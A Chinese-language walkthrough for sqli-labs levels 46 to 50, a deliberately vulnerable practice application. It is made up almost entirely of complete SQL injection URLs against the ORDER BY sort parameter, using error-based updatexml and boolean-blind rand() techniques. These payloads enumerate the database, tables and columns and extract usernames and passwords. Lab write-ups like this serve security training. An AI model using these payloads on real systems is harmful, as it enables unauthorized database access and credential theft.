sql-labs46-50通关攻略

第46关

一.查询数据库

http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+

二.查表

http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)--+http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)--+

三.查列

http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)--+http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)--+

四.查user表里数据

http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20substring(group_concat(username,%27:%27,password),1,32)%20from%20users%20),0x7e),1)--+http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20substring(group_concat(username,%27:%27,password),1,32)%20from%20users%20),0x7e),1)--+#substring

第47关

一.查询数据库

http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)--+http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)--+

二.查表

http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)--+http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)--+

三.查列

http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)--+http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)--+

四.查询user表中数据

http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20concat(username,0x3a,password)from%20users%20limit%200,1),0x7e),1)--+http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20concat(username,0x3a,password)from%20users%20limit%200,1),0x7e),1)--+

第48关

使用布尔盲注

一.查询数据库长度

http://127.0.0.1/Less-48/?sort=rand(length(database())=8)http://127.0.0.1/Less-48/?sort=rand(length(database())=8)

数据库长度为8

二.查询数据库命第一个字符

http://127.0.0.1/Less-48/?sort=rand(ascii(mid(database(),1,1))=101)http://127.0.0.1/Less-48/?sort=rand(ascii(mid(database(),1,1))=101)

ascii码 为101第一个字符为s

........接着往后查回查出数据库为'security'

三.查表格个数

http://127.0.0.1/Less-48/?sort=rand((select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=database())=4)http://127.0.0.1/Less-48/?sort=rand((select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=database())=4)

说明数据库里有四个表格

四.第一个表格的名称的首字母

http://127.0.0.1/Less-48/?sort=rand(ascii(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))=101)http://127.0.0.1/Less-48/?sort=rand(ascii(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))=101)

说明第一个表的字符为e

后面数据查询,同上

第49关

同48关

区别:字符型,需要用 ' 闭合

第50关

一.查询数据库

http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,database(),0x7e),1)http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,database(),0x7e),1)

二.查表

http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)

三.查列

http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)

四.查询user表中数据

http://127.0.0.1/Less-50/?sort=updatexml(1,concat(0x7e,(select%20concat(username,0x3a,password)from%20users%20limit%200,1),0x7e),1)http://127.0.0.1/Less-50/?sort=updatexml(1,concat(0x7e,(select%20concat(username,0x3a,password)from%20users%20limit%200,1),0x7e),1)

相关推荐
观无2 小时前
数据库DDL
数据库·oracle
消失在人海中2 小时前
Oracle 内存优化
数据库·oracle
昭阳~3 小时前
MySQL读写分离
数据库·mysql
jjkkzzzz6 小时前
Linux下的c/c++开发之操作Redis数据库
数据库·c++·redis
老华带你飞6 小时前
实习记录小程序|基于SSM+Vue的实习记录小程序设计与实现(源码+数据库+文档)
java·数据库·spring boot·小程序·论文·毕设·实习记录小程序
Elastic 中国社区官方博客7 小时前
Elasticsearch 索引副本数
大数据·数据库·elasticsearch·搜索引擎·全文检索
冬瓜的编程笔记8 小时前
【八股战神篇】MySQL高频面试题
数据库·mysql·面试
赵渝强老师8 小时前
【赵渝强老师】Memcached的路由算法
数据库·redis·nosql·memcached
belldeep8 小时前
groovy 如何遍历 postgresql 所有的用户表 ?
数据库·postgresql